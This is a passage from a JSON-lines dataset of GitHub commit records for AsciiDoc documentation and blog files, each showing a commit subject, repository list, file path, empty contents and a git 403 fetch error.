uo\/elasticsearch,iacdingping\/elasticsearch,jimczi\/elasticsearch,episerver\/elasticsearch,Rygbee\/elasticsearch,infusionsoft\/elasticsearch,jeteve\/elasticsearch,coding0011\/elasticsearch,JervyShi\/elasticsearch,tebriel\/elasticsearch,mbrukman\/elasticsearch,Collaborne\/elasticsearch,mnylen\/elasticsearch,onegambler\/elasticsearch,franklanganke\/elasticsearch,diendt\/elasticsearch,polyfractal\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,areek\/elasticsearch,cwurm\/elasticsearch,tebriel\/elasticsearch,lzo\/elasticsearch-1,infusionsoft\/elasticsearch,awislowski\/elasticsearch,franklanganke\/elasticsearch,schonfeld\/elasticsearch,glefloch\/elasticsearch,ivansun1010\/elasticsearch,elasticdog\/elasticsearch,andrestc\/elasticsearch,rmuir\/elasticsearch,qwerty4030\/elasticsearch,drewr\/elasticsearch,HonzaKral\/elasticsearch,weipinghe\/elasticsearch,ESamir\/elasticsearch,Helen-Zhao\/elasticsearch,clintongormley\/elasticsearch
,wenpos\/elasticsearch,jango2015\/elasticsearch,JackyMai\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,areek\/elasticsearch,andrestc\/elasticsearch,naveenhooda2000\/elasticsearch,xuzha\/elasticsearch,winstonewert\/elasticsearch,socialrank\/elasticsearch,areek\/elasticsearch,ricardocerq\/elasticsearch,nezirus\/elasticsearch,kalburgimanjunath\/elasticsearch,shreejay\/elasticsearch,martinstuga\/elasticsearch,kunallimaye\/elasticsearch,fforbeck\/elasticsearch,girirajsharma\/elasticsearch,geidies\/elasticsearch,cnfire\/elasticsearch-1,kunallimaye\/elasticsearch,kalburgimanjunath\/elasticsearch,awislowski\/elasticsearch,jpountz\/elasticsearch,KimTaehee\/elasticsearch,Stacey-Gammon\/elasticsearch,lzo\/elasticsearch-1,mcku\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/compound-word-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/compound-word-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f71dadfdf3c709bbdbc8ce3ee26b32125248d36e","subject":"Update 2016-05-23-Predicting-hand-position-on-the-keyboard-by-observing-random-text.adoc","message":"Update 2016-05-23-Predicting-hand-position-on-the-keyboard-by-observing-random-text.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-23-Predicting-hand-position-on-the-keyboard-by-observing-random-text.adoc","new_file":"_posts\/2016-05-23-Predicting-hand-position-on-the-keyboard-by-observing-random-text.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"971df25d14efa1e8ff61ef49f4b7fa222a43adf7","subject":"Update 2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","message":"Update 2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","new_file":"_posts\/2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcc3a3c3fa795af2dafda1bf7564522227a0899d","subject":"Update 2015-09-06-5-Libros-Gratuitos-para-aprender-HTML5-y-CSS3.adoc","message":"Update 2015-09-06-5-Libros-Gratuitos-para-aprender-HTML5-y-CSS3.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-06-5-Libros-Gratuitos-para-aprender-HTML5-y-CSS3.adoc","new_file":"_posts\/2015-09-06-5-Libros-Gratuitos-para-aprender-HTML5-y-CSS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c296fa9806cc25740c6027ddb40c381792e9ec3d","subject":"Added German localization","message":"Added German 
localization\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website","old_file":"localized\/de\/index.adoc","new_file":"localized\/de\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4db447377079f3d4065bbcd3ab8d820a5564fc0","subject":"Update 2016-07-22-Il-buyback-dei-titoli-bancari-unarma-in-piu-contro-la-paura-da-bail-in.adoc","message":"Update 2016-07-22-Il-buyback-dei-titoli-bancari-unarma-in-piu-contro-la-paura-da-bail-in.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Il-buyback-dei-titoli-bancari-unarma-in-piu-contro-la-paura-da-bail-in.adoc","new_file":"_posts\/2016-07-22-Il-buyback-dei-titoli-bancari-unarma-in-piu-contro-la-paura-da-bail-in.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c761aa1cfcc5b6135e84acc0f52961896e18b4b5","subject":"y2b create post Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 2)","message":"y2b create post Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 2)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-2.adoc","new_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be964061f7c7eb90f122b6fe2ea3ad11adbe38d8","subject":"job: #11396 added structural mapping","message":"job: #11396 added structural 
mapping\n","repos":"rmulvey\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11396_wasl_structure\/11396_wasl_structure_ant.adoc","new_file":"doc-bridgepoint\/notes\/11396_wasl_structure\/11396_wasl_structure_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"684bf59122751f544ca6cfaa3f565e9f19e5bbdc","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4dd7f2397d6f302f21949327514f1d94d1e6ae","subject":"Update 2015-09-20-Inicio.adoc","message":"Update 2015-09-20-Inicio.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-09-20-Inicio.adoc","new_file":"_posts\/2015-09-20-Inicio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f139685060abf28d9f6ccfde30d2469046e17dd0","subject":"Update 2016-11-13-Graphs.adoc","message":"Update 2016-11-13-Graphs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Graphs.adoc","new_file":"_posts\/2016-11-13-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e19a07fefcae9c8051a1a86391183157cf0e17","subject":"Update 
2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc630d4125eeb1169330ab9ae3d155eb139a0c0a","subject":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18d0a0a532152e894f8c4cb87d116ba41f8fc57e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46f485a1a60554dd6f22090dbc9d0e95a7ba08d0","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea01e8dede8fbbebda1aa898df56d455f5349ce4","subject":"add README.asciidoc","message":"add 
README.asciidoc\n","repos":"jasontedor\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop","old_file":"repository-hdfs\/README.asciidoc","new_file":"repository-hdfs\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15f726913ced271bff4d5d46e73d1fcbed549296","subject":"fix(README): Merge PR #131","message":"fix(README): Merge PR #131\n","repos":"anthonny\/dev.hubpress.io,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,TheAshwanik\/new,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,TheAshwanik\/new,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13d779dcd4ac4aa16855a4a722bcb5dbfeb10d1b","subject":"Explain how to convert an AsciiDoc file to a reveal.js presentation.","message":"Explain how to convert an AsciiDoc file to a reveal.js presentation.\n","repos":"asciidoctor\/asciidoctor-cli.js,asciidoctor\/asciidoctor-cli.js","old_file":"docs\/manual.adoc","new_file":"docs\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-cli.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d90d772203165d87c6508500072cfb5c7eda538","subject":"Added dummy 2-5 release notes file","message":"Added dummy 2-5 release notes file\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-2-5-release-notes.adoc","new_file":"virt\/virt-2-5-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb9ffeb069ddcc54fbe4e06a18a8bf6383287bce","subject":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","message":"Update 
2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65282638526eaeb19ef4244a5320706ec851abec","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"229c6d86c4c93b83e4d96c8ebacdafd567558627","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c1802ea0d7b31dbb5bf4a61d89fa8794bfced7","subject":"Polish","message":"Polish\n","repos":"spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d81d5d9211b3ca4c60e01943440b8a11ce05e2f5","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 
2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90fcc02101d0ce4abb7b97d82e4851f4b2969c9","subject":"Update 2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","message":"Update 2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_file":"_posts\/2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bacbac617000c7c40de2100739f953735fe6fc9","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e98193484a93d7ce32081d3a968aca1d710873","subject":"Added lab for new-topic","message":"Added lab for new-topic\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/new-topic.adoc","new_file":"lab\/new-topic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0caf674d1ece4323c746163fe8999679cae683f1","subject":"Debezium 0.8.0.Final release announcement","message":"Debezium 0.8.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-12-debezium-0-8-0-final-released.adoc","new_file":"blog\/2018-07-12-debezium-0-8-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344b862e89c5f10f9a51ab62c7b0eb38cb358111","subject":"y2b create post JBL Cinema SB200 Bluetooth Soundbar Speaker Unboxing \\u0026 Overview","message":"y2b create post JBL Cinema SB200 Bluetooth Soundbar Speaker Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-31-JBL-Cinema-SB200-Bluetooth-Soundbar-Speaker-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-31-JBL-Cinema-SB200-Bluetooth-Soundbar-Speaker-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4cd546ed412ecacd7aea0cfd9f19a5d2439e70","subject":"Added ohloh widget to README","message":"Added ohloh widget to README\n","repos":"oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2750e5db51d96f05bb129f279fd742aecd46c57c","subject":"Update 2016-01-17-demo.adoc","message":"Update 2016-01-17-demo.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-17-demo.adoc","new_file":"_posts\/2016-01-17-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af739a47d0424baaa542eb188ec27eb1d4f67cb6","subject":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","message":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","new_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c42e45cc9870dfad03affbda13f06d8a7628e6","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ada3636cd729edfd2cbf36a2595e92b6765161","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d61b742ae94fcdf7c8a5b26cd138516b009236","subject":"Update 2018-03-24-places.adoc","message":"Update 2018-03-24-places.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-24-places.adoc","new_file":"_posts\/2018-03-24-places.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df8c0af11407936f8e93ce6003ec8ce3de85b6b2","subject":"Update 2018-11-13-Nuxtjs.adoc","message":"Update 2018-11-13-Nuxtjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 